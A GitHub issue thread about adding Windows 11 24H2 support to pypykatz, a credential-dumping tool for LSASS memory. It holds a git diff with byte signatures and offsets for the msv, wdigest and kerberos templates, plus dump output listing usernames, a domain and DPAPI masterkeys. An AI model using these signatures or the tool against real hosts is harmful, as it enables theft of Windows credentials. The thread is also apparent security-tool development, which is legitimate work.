Win11 24H2 Signature Missing #174
Comments
|
Seems like a pretty complex task for someone like me who doesn't fully understand how this tool works. At a high level I think the 24H2 build number needs to be included for these template checks. I tinkered with it some but now I am getting a kerberos exception. The signature and offset for the kerberos template should be fine so I'm guessing it's a problem with the structs. The diff below shows the changes I made to find what I think is the right signature and offset for the msv and wdigest templates. git diff
diff --git a/pypykatz/commons/common.py b/pypykatz/commons/common.py
index 986c0ff..e726b27 100644
--- a/pypykatz/commons/common.py
+++ b/pypykatz/commons/common.py
@@ -362,6 +362,7 @@ class WindowsBuild(enum.Enum):
WIN_10_20H2 = 19042
WIN_11_2022 = 20348
WIN_11_2023 = 22621
+ WIN_11_2024 = 26100
class WindowsMinBuild(enum.Enum):
WIN_XP = 2500
@@ -372,6 +373,7 @@ class WindowsMinBuild(enum.Enum):
WIN_BLUE = 9400
WIN_10 = 9800
WIN_11 = 22000
+ WIN_11_24H2 = 26100
def hexdump( src, length=16, sep='.', start = 0):
diff --git a/pypykatz/lsadecryptor/packages/kerberos/templates.py b/pypykatz/lsadecryptor/packages/kerberos/templates.py
index 320b8aa..4485d90 100644
--- a/pypykatz/lsadecryptor/packages/kerberos/templates.py
+++ b/pypykatz/lsadecryptor/packages/kerberos/templates.py
@@ -101,7 +101,16 @@ class KerberosTemplate(PackageTemplate):
template.hash_password_struct = KERB_HASHPASSWORD_6_1607
template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
- elif sysinfo.buildnumber >= WindowsBuild.WIN_11_2022.value:
+ elif WindowsBuild.WIN_11_2022.value <= sysinfo.buildnumber < WindowsBuild.WIN_11_2024.value:
+ template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
+ template.first_entry_offset = 6
+ template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10_1607
+ template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_11
+ template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
+ template.hash_password_struct = KERB_HASHPASSWORD_6_1607
+ template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
+
+ elif sysinfo.buildnumber >= WindowsBuild.WIN_11_2024.value:
template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
template.first_entry_offset = 6
template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10_1607
diff --git a/pypykatz/lsadecryptor/packages/msv/templates.py b/pypykatz/lsadecryptor/packages/msv/templates.py
index 20600df..e3cb6ba 100644
--- a/pypykatz/lsadecryptor/packages/msv/templates.py
+++ b/pypykatz/lsadecryptor/packages/msv/templates.py
@@ -137,10 +137,15 @@ class MsvTemplate(PackageTemplate):
template.first_entry_offset = 24
template.offset2 = -4
- else:
+ elif WindowsBuild.WIN_11_2023.value <= sysinfo.buildnumber < WindowsBuild.WIN_11_2024.value:
template.signature = b'\x45\x89\x37\x4c\x8b\xf7\x8b\xf3\x45\x85\xc0\x0f'
template.first_entry_offset = 27
template.offset2 = -4
+
+ else:
+ template.signature = b'\x4c\x8b\xfe\x48\x85\xf6\x0f'
+ template.first_entry_offset = 52
+ template.offset2 = -4
elif sysinfo.architecture == KatzSystemArchitecture.X86:
if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
diff --git a/pypykatz/lsadecryptor/packages/wdigest/templates.py b/pypykatz/lsadecryptor/packages/wdigest/templates.py
index 150f5f1..f53cb3b 100644
--- a/pypykatz/lsadecryptor/packages/wdigest/templates.py
+++ b/pypykatz/lsadecryptor/packages/wdigest/templates.py
@@ -41,11 +41,17 @@ class WdigestTemplate(PackageTemplate):
template.primary_offset = 48
template.list_entry = PWdigestListEntry
- elif sysinfo.buildnumber >= WindowsMinBuild.WIN_11.value:
+ elif WindowsMinBuild.WIN_11.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_11_24H2.value:
template.signature = b'\x48\x3b\xd8\x74'
template.first_entry_offset = -4
template.primary_offset = 48
template.list_entry = PWdigestListEntry
+
+ elif sysinfo.buildnumber >= WindowsMinBuild.WIN_11_24H2.value:
+ template.signature = b'\x48\x3b\xd9\x0f'
+ template.first_entry_offset = -4
+ template.primary_offset = 48
+ template.list_entry = PWdigestListEntry
else:
raise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber)) |
|
You are right I didn't include the build number. To test it I put my code in the else condition (no build number match, execute with my signature) This is the guide I followed to get the signature values. https://www.praetorian.com/blog/inside-mimikatz-part2/ |
|
Thanks for the article. Still not 100% sure on calculating the offset. 23 maybe? I'm also getting a peb parsing error. Here's is my current output with the changes I made. pypykatz lsa minidump ../lsass_win11.dmp
INFO:pypykatz:Parsing file ../lsass_win11.dmp
ERROR:root:PEB parsing error!
Traceback (most recent call last):
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpfile.py", line 86, in _parse
self.__parse_peb()
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpfile.py", line 235, in __parse_peb
self.peb = PEB.from_minidump(self)
^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/structures/peb.py", line 85, in from_minidump
buff_reader.move(minidumpfile.threads.threads[0].Teb + PEB_OFFSETS[offset_index]["peb"])
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpreader.py", line 136, in move
self._select_segment(address)
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpreader.py", line 104, in _select_segment
raise Exception('Memory address 0x%08x is not in process memory space' % requested_position)
Exception: Memory address 0x00000060 is not in process memory space
FILE: ======== ../lsass_win11.dmp =======
== Orphaned credentials ==
== WDIGEST [887d6]==
username Administrator
domainname JUICY
password None
password (hex)
== WDIGEST [14332]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [142e5]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [3e4]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [d8a3]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [d908]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [3e7]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== DPAPI [887d6]==
luid 559062
key_guid 9536a4de-f4ab-454a-8605-45c30ea579ea
masterkey 8e8a281bbd7d1f6063b8f2b6cc1e0fe4b427162acaad48565c757159419078e63afec2bc47b9ab536600aa7f852f23ac02fd39c8a864b58294891dacc9b7042a
sha1_masterkey f9d9a897d4501d268008cd519f8db403be976a6e
== DPAPI [3e7]==
luid 999
key_guid 896fd8e5-88d1-4328-bc25-8b7c2b58ae3b
masterkey 0fc77e1e7956dc9a54a5eeffdde3cee1574734d8150abaf58b1a82a2a90ce0e2604f27a2499a77a75f29e26fcf8586ccbe915ad74ba19063fc8285c312d35aa1
sha1_masterkey 7a1edd5c4501ef9ae7278c7654b4bcff337d859b
== DPAPI [3e7]==
luid 999
key_guid 67c2715a-9448-4e8f-a378-692bd18b7ee1
masterkey b66f15ed9b4b62c38cc9a407fce7034643b376ab60a9a4eccfb33d09094c07e02efc139517d59e4e7d9991135f0509b5721ae9308d4a9e9905567a507e930863
sha1_masterkey 55d12300aa2028b8db413f9881332e73b12210e7
== DPAPI [3e7]==
luid 999
key_guid 98c6d1f2-8891-4b1c-be2c-36a968a3b4ea
masterkey a8ed2aae4bd435a265f86a6de3bbd75df90ddcd616710b3a6039f6203c67c00e74dcfb0bd3169b0305b17ca3bab0aebf8a64e9cb350b60cb8506c4a0be72d04d
sha1_masterkey 701d9b5ef41de502fb6baac0d064ab92c2db7595
== Errors ==
kerberos_exception_please_report TWVtb3J5IGFkZHJlc3MgMHgwMDAwMDAwMiBpcyBub3QgaW4gcHJvY2VzcyBtZW1vcnkgc3BhY2UNCiAgRmlsZSAiL2hvbWUva2FsaS8ubG9jYWwvc2hhcmUvcGlweC92ZW52cy9weXB5a2F0ei9saWIvcHl0aG9uMy4xMi9zaXRlLXBhY2thZ2VzL3B5cHlrYXR6L3B5cHlrYXR6LnB5IiwgbGluZSAzNzAsIGluIHN0YXJ0CiAgICBzZWxmLmdldF9rZXJiZXJvcyh3aXRoX3RpY2tldHMpCg0KICBGaWxlICIvaG9tZS9rYWxpLy5sb2NhbC9zaGFyZS9waXB4L3ZlbnZzL3B5cHlrYXR6L2xpYi9weXRob24zLjEyL3NpdGUtcGFja2FnZXMvcHlweWthdHovcHlweWthdHoucHkiLCBsaW5lIDMyNSwgaW4gZ2V0X2tlcmJlcm9zCiAgICBkZWMuc3RhcnQoKQoNCiAgRmlsZSAiL2hvbWUva2FsaS8ubG9jYWwvc2hhcmUvcGlweC92ZW52cy9weXB5a2F0ei9saWIvcHl0aG9uMy4xMi9zaXRlLXBhY2thZ2VzL3B5cHlrYXR6L2xzYWRlY3J5cHRvci9wYWNrYWdlcy9rZXJiZXJvcy9kZWNyeXB0b3IucHkiLCBsaW5lIDExMywgaW4gc3RhcnQKICAgIHNlbGYucHJvY2Vzc19zZXNzaW9uKGtlcmJlcm9zX2xvZ29uX3Nlc3Npb24pCg0KICBGaWxlICIvaG9tZS9rYWxpLy5sb2NhbC9zaGFyZS9waXB4L3ZlbnZzL3B5cHlrYXR6L2xpYi9weXRob24zLjEyL3NpdGUtcGFja2FnZXMvcHlweWthdHovbHNhZGVjcnlwdG9yL3BhY2thZ2VzL2tlcmJlcm9zL2RlY3J5cHRvci5weSIsIGxpbmUgMTI3LCBpbiBwcm9jZXNzX3Nlc3Npb24KICAgIHNlbGYuY3VycmVudF9jcmVkLmRvbWFpbm5hbWUgPSBrZXJiZXJvc19sb2dvbl9zZXNzaW9uLmNyZWRlbnRpYWxzLkRvbWFpbmUucmVhZF9zdHJpbmcoc2VsZi5yZWFkZXIpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXgoNCiAgRmlsZSAiL2hvbWUva2FsaS8ubG9jYWwvc2hhcmUvcGlweC92ZW52cy9weXB5a2F0ei9saWIvcHl0aG9uMy4xMi9zaXRlLXBhY2thZ2VzL3B5cHlrYXR6L2NvbW1vbnMvd2luX2RhdGF0eXBlcy5weSIsIGxpbmUgNTUsIGluIHJlYWRfc3RyaW5nCiAgICByZWFkZXIubW92ZShzZWxmLkJ1ZmZlcikKDQogIEZpbGUgIi9ob21lL2thbGkvLmxvY2FsL3NoYXJlL3BpcHgvdmVudnMvcHlweWthdHovbGliL3B5dGhvbjMuMTIvc2l0ZS1wYWNrYWdlcy9taW5pZHVtcC9taW5pZHVtcHJlYWRlci5weSIsIGxpbmUgMTM2LCBpbiBtb3ZlCiAgICBzZWxmLl9zZWxlY3Rfc2VnbWVudChhZGRyZXNzKQoNCiAgRmlsZSAiL2hvbWUva2FsaS8ubG9jYWwvc2hhcmUvcGlweC92ZW52cy9weXB5a2F0ei9saWIvcHl0aG9uMy4xMi9zaXRlLXBhY2thZ2VzL21pbmlkdW1wL21pbmlkdW1wcmVhZGVyLnB5IiwgbGluZSAxMDQsIGluIF9zZWxlY3Rfc2VnbWVudAogICAgcmFpc2UgRXhjZXB0aW9uKCdNZW1vcnkgYWRkcmVzcyAweCUwOHggaXMgbm90IGluIHByb2Nlc3MgbWVtb3J5IHNwYWNlJyAlIHJlcXVlc3RlZF9wb3NpdGlvbikK |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Pypykatz doens't contain the signatures for Win11 24H2 yet. I tried to implement it but I haven't managed yet. If anybody is better at reverse engineering, this is my progress so far:
This might be completely wrong though.
I attached lsasrv.dll from Win11 24H2.
lsasrv.zip
The text was updated successfully, but these errors were encountered: